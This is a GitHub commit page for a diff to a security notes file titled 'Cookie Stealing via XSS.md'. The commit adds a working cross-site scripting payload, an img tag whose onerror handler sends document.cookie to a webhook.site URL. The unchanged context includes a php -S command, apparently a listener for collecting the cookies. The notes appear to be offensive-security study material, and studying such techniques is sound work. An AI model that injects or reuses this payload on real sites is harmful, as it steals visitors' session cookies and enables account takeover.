Skip to content

Commit 1ec9a3f

Browse files
authored
Update Cookie Stealing via XSS.md
1 parent b686fe2 commit 1ec9a3f

File tree

1 file changed

+7
-0
lines changed

1 file changed

+7
-0
lines changed

Web Security/Cookie Stealing via XSS.md

+7
Original file line numberDiff line numberDiff line change
@@ -40,4 +40,11 @@
4040
$ php -S IP:8008
4141
```
4242

43+
## Attacker Controlled HTTP Request (Online):
44+
Using: https://webhook.site/
45+
46+
```html
47+
<img src=x onerror="location.href='https://webhook.site/?c='+ document.cookie">
48+
```
49+
4350
**By 0xRar**

0 commit comments

Comments
 (0)